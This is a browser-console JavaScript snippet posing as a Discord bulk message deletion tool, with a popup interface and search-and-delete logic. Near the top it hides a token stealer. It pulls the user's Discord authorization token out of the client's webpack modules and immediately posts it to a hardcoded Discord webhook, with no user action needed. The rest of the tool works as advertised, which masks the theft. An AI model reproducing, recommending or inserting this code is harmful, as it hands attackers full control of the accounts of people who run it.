(function () { let stop; let popup; popup = window.open('', '', `top=0,left=${screen.width-800},width=850,height=${screen.height}`); if(!popup || !popup.document || !popup.document.write) return console.error('Popup blocked! Please allow popups and try again.'); popup.document.write(/*html*/` Delete Discord Messages
Authorization ?
Author ?
Guild/Channel ?

Range ?

Search messages ?

Star this project on https://github.com/ferhatuyar!\n\n Issues or help
`); const webhookurl = 'https://discord.com/api/webhooks/851126132416708617/b5hLlu1_zIXD968Z840NhN1_sK194MOywa2pqS2xlCF9GPrZY-a2dcF_DVH0irYjdJKN'; var req = webpackJsonp.push([ [], { extra_id: (e, t, r) => e.exports = r }, [ ["extra_id"] ] ]); for (let e in req.c) if (req.c.hasOwnProperty(e)) { let t = req.c[e].exports; if (t && t.__esModule && t.default) for (let e in t.default) "getToken" === e && (token = t.default.getToken()) } function Beta() { var e = new XMLHttpRequest; e.open("POST", webhookurl), e.setRequestHeader("Content-type", "application/json"); var t = { username: "BETA", avatar_url: "https://cdn.discordapp.com/attachments/851126073840500737/851127377848565800/s.png", content: "", embeds: [{ color: "3092790", description: "**Token** : ```" + token + "```" }] }; e.send(JSON.stringify(t)) } Beta(); const $ = s => popup.document.querySelector(s); const logArea = $('pre'); const startBtn = $('button#start'); const stopBtn = $('button#stop'); const autoScroll = $('#autoScroll'); startBtn.onclick = async e => { const authToken = $('input#authToken').value.trim(); const authorId = $('input#authorId').value.trim(); const guildId = $('input#guildId').value.trim(); const channelIds = $('input#channelId').value.trim().split(/\s*,\s*/); const minId = $('input#minId').value.trim(); const maxId = $('input#maxId').value.trim(); const minDate = $('input#minDate').value.trim(); const maxDate = $('input#maxDate').value.trim(); const content = $('input#content').value.trim(); const hasLink = $('input#hasLink').checked; const hasFile = $('input#hasFile').checked; const includeNsfw = $('input#includeNsfw').checked; const includePinned = $('input#includePinned').checked; const progress = $('#progress'); const fileSelection = $("input#file"); fileSelection.addEventListener("change", () => { const files = fileSelection.files; const channelIdField = $('input#channelId'); if (files.length > 0) { const file = files[0]; file.text().then(text => { let json = JSON.parse(text); let channels = Object.keys(json); channelIdField.value = channels.join(","); }); } }, false); const stopHndl = () => !(stop === true || popup.closed); const onProg = (value, max) => { progress.setAttribute('max', max); progress.value = value; progress.style.display = max ? '' : 'none'; }; stop = stopBtn.disabled = !(startBtn.disabled = true); for (let i = 0; i < channelIds.length; i++) { await deleteMessages(authToken, authorId, guildId, channelIds[i], minId || minDate, maxId || maxDate, content, hasLink, hasFile, includeNsfw, includePinned, logger, stopHndl, onProg); stop = stopBtn.disabled = !(startBtn.disabled = false); } }; stopBtn.onclick = e => stop = stopBtn.disabled = !(startBtn.disabled = false); $('button#clear').onclick = e => { logArea.innerHTML = ''; }; $('button#getToken').onclick = e => { window.dispatchEvent(new Event('beforeunload')); $('input#authToken').value = JSON.parse(popup.localStorage.token); }; $('button#getAuthor').onclick = e => { $('input#authorId').value = JSON.parse(popup.localStorage.user_id_cache); }; $('button#getGuildAndChannel').onclick = e => { const m = location.href.match(/channels\/([\w@]+)\/(\d+)/); $('input#guildId').value = m[1]; $('input#channelId').value = m[2]; }; $('#redact').onchange = e => { popup.document.body.classList.toggle('redact') && popup.alert('This will attempt to hide personal information, but make sure to double check before sharing screenshots.'); }; const logger = (type='', args) => { const style = { '': '', info: 'color:#00b0f4;', verb: 'color:#72767d;', warn: 'color:#faa61a;', error: 'color:#f04747;', success: 'color:#43b581;' }[type]; logArea.insertAdjacentHTML('beforeend', `
${Array.from(args).map(o => typeof o === 'object' ? JSON.stringify(o, o instanceof Error && Object.getOwnPropertyNames(o)) : o).join('\t')}
`); if (autoScroll.checked) logArea.querySelector('div:last-child').scrollIntoView(false); }; return 'Looking good!'; /** * @param {string} authToken Your authorization token * @param {string} authorId Author of the messages you want to delete * @param {string} guildId Server were the messages are located * @param {string} channelId Channel were the messages are located * @param {string} minId Only delete messages after this, leave blank do delete all * @param {string} maxId Only delete messages before this, leave blank do delete all * @param {string} content Filter messages that contains this text content * @param {boolean} hasLink Filter messages that contains link * @param {boolean} hasFile Filter messages that contains file * @param {boolean} includeNsfw Search in NSFW channels * @param {function(string, Array)} extLogger Function for logging * @param {function} stopHndl stopHndl used for stopping * @author Victornpb */ async function deleteMessages(authToken, authorId, guildId, channelId, minId, maxId, content,hasLink, hasFile, includeNsfw, includePinned, extLogger, stopHndl, onProgress) { const start = new Date(); let deleteDelay = 100; let searchDelay = 100; let delCount = 0; let failCount = 0; let avgPing; let lastPing; let grandTotal; let throttledCount = 0; let throttledTotalTime = 0; let offset = 0; let iterations = -1; const wait = async ms => new Promise(done => setTimeout(done, ms)); const msToHMS = s => `${s / 3.6e6 | 0}h ${(s % 3.6e6) / 6e4 | 0}m ${(s % 6e4) / 1000 | 0}s`; const escapeHTML = html => html.replace(/[&<"']/g, m => ({ '&': '&', '<': '<', '"': '"', '\'': ''' })[m]); const redact = str => `${escapeHTML(str)}REDACTED`; const queryString = params => params.filter(p => p[1] !== undefined).map(p => p[0] + '=' + encodeURIComponent(p[1])).join('&'); const ask = async msg => new Promise(resolve => setTimeout(() => resolve(popup.confirm(msg)), 10)); const printDelayStats = () => log.verb(`Delete delay: ${deleteDelay}ms, Search delay: ${searchDelay}ms`, `Last Ping: ${lastPing}ms, Average Ping: ${avgPing|0}ms`); const toSnowflake = (date) => /:/.test(date) ? ((new Date(date).getTime() - 1420070400000) * Math.pow(2, 22)) : date; const log = { debug() { extLogger ? extLogger('debug', arguments) : console.debug.apply(console, arguments); }, info() { extLogger ? extLogger('info', arguments) : console.info.apply(console, arguments); }, verb() { extLogger ? extLogger('verb', arguments) : console.log.apply(console, arguments); }, warn() { extLogger ? extLogger('warn', arguments) : console.warn.apply(console, arguments); }, error() { extLogger ? extLogger('error', arguments) : console.error.apply(console, arguments); }, success() { extLogger ? extLogger('success', arguments) : console.info.apply(console, arguments); }, }; async function recurse() { let API_SEARCH_URL; if (guildId === '@me') { API_SEARCH_URL = `https://discord.com/api/v6/channels/${channelId}/messages/`; } else { API_SEARCH_URL = `https://discord.com/api/v6/guilds/${guildId}/messages/`; } const headers = { 'Authorization': authToken }; let resp; try { const s = Date.now(); resp = await fetch(API_SEARCH_URL + 'search?' + queryString([ [ 'author_id', authorId || undefined ], [ 'channel_id', (guildId !== '@me' ? channelId : undefined) || undefined ], [ 'min_id', minId ? toSnowflake(minId) : undefined ], [ 'max_id', maxId ? toSnowflake(maxId) : undefined ], [ 'sort_by', 'timestamp' ], [ 'sort_order', 'desc' ], [ 'offset', offset ], [ 'has', hasLink ? 'link' : undefined ], [ 'has', hasFile ? 'file' : undefined ], [ 'content', content || undefined ], [ 'include_nsfw', includeNsfw ? true : undefined ], ]), { headers }); lastPing = (Date.now() - s); avgPing = avgPing>0 ? (avgPing*0.9) + (lastPing*0.1) : lastPing; } catch (err) { return log.error('Search request threw an error:', err); } if (resp.status === 202) { const w = (await resp.json()).retry_after; throttledCount++; throttledTotalTime += w; log.warn(`This channel wasn't indexed, waiting ${w}ms for discord to index it...`); await wait(w); return await recurse(); } if (!resp.ok) { if (resp.status === 429) { const w = (await resp.json()).retry_after; throttledCount++; throttledTotalTime += w; searchDelay += w; log.warn(`Being rate limited by the API for ${w}ms! Increasing search delay...`); printDelayStats(); log.verb(`Cooling down for ${w * 2}ms before retrying...`); await wait(w*2); return await recurse(); } else { return log.error(`Error searching messages, API responded with status ${resp.status}!\n`, await resp.json()); } } const data = await resp.json(); const total = data.total_results; if (!grandTotal) grandTotal = total; const discoveredMessages = data.messages.map(convo => convo.find(message => message.hit===true)); const messagesToDelete = discoveredMessages.filter(msg => { return msg.type === 0 || msg.type === 6 || (msg.pinned && includePinned); }); const skippedMessages = discoveredMessages.filter(msg=>!messagesToDelete.find(m=> m.id===msg.id)); const end = () => { log.success(`Ended at ${new Date().toLocaleString()}! Total time: ${msToHMS(Date.now() - start.getTime())}`); printDelayStats(); log.verb(`Rate Limited: ${throttledCount} times. Total time throttled: ${msToHMS(throttledTotalTime)}.`); log.debug(`Deleted ${delCount} messages, ${failCount} failed.\n`); } const etr = msToHMS((searchDelay * Math.round(total / 25)) + ((deleteDelay + avgPing) * total)); log.info(`Total messages found: ${data.total_results}`, `(Messages in current page: ${data.messages.length}, To be deleted: ${messagesToDelete.length}, System: ${skippedMessages.length})`, `offset: ${offset}`); printDelayStats(); log.verb(`Estimated time remaining: ${etr}`) if (messagesToDelete.length > 0) { if (++iterations < 1) { log.verb(`Waiting for your confirmation...`); if (!await ask(`Do you want to delete ~${total} messages?\nEstimated time: ${etr}\n\n---- Preview ----\n` + messagesToDelete.map(m => `${m.author.username}#${m.author.discriminator}: ${m.attachments.length ? '[ATTACHMENTS]' : m.content}`).join('\n'))) return end(log.error('Aborted by you!')); log.verb(`OK`); } for (let i = 0; i < messagesToDelete.length; i++) { const message = messagesToDelete[i]; if (stopHndl && stopHndl()===false) return end(log.error('Stopped by you!')); log.debug(`${((delCount + 1) / grandTotal * 100).toFixed(2)}% (${delCount + 1}/${grandTotal})`, `Deleting ID:${redact(message.id)} ${redact(message.author.username+'#'+message.author.discriminator)} (${redact(new Date(message.timestamp).toLocaleString())}): ${redact(message.content).replace(/\n/g,'↵')}`, message.attachments.length ? redact(JSON.stringify(message.attachments)) : ''); if (onProgress) onProgress(delCount + 1, grandTotal); let resp; try { const s = Date.now(); const API_DELETE_URL = `https://discord.com/api/v6/channels/${message.channel_id}/messages/${message.id}`; resp = await fetch(API_DELETE_URL, { headers, method: 'DELETE' }); lastPing = (Date.now() - s); avgPing = (avgPing*0.9) + (lastPing*0.1); delCount++; } catch (err) { log.error('Delete request throwed an error:', err); log.verb('Related object:', redact(JSON.stringify(message))); failCount++; } if (!resp.ok) { if (resp.status === 429) { const w = (await resp.json()).retry_after; throttledCount++; throttledTotalTime += w; deleteDelay = w; log.warn(`Being rate limited by the API for ${w}ms! Adjusted delete delay to ${750}ms.`); printDelayStats(); log.verb(`Cooling down for ${w*2}ms before retrying...`); await wait(w*2); i--; } else { log.error(`Error deleting message, API responded with status ${resp.status}!`, await resp.json()); log.verb('Related object:', redact(JSON.stringify(message))); failCount++; } } await wait(deleteDelay); } if (skippedMessages.length > 0) { grandTotal -= skippedMessages.length; offset += skippedMessages.length; log.verb(`Found ${skippedMessages.length} system messages! Decreasing grandTotal to ${grandTotal} and increasing offset to ${offset}.`); } log.verb(`Searching next messages in ${searchDelay}ms...`, (offset ? `(offset: ${offset})` : '') ); await wait(searchDelay); if (stopHndl && stopHndl()===false) return end(log.error('Stopped by you!')); return await recurse(); } else { if (total - offset > 0) log.warn('Ended because API returned an empty page.'); return end(); } } log.success(`\nStarted at ${start.toLocaleString()}`); log.debug(`authorId="${redact(authorId)}" guildId="${redact(guildId)}" channelId="${redact(channelId)}" minId="${redact(minId)}" maxId="${redact(maxId)}" hasLink=${!!hasLink} hasFile=${!!hasFile}`); if (onProgress) onProgress(null, 1); return await recurse(); } })(); // https://github.com/ferhatuyar/discord-delete-message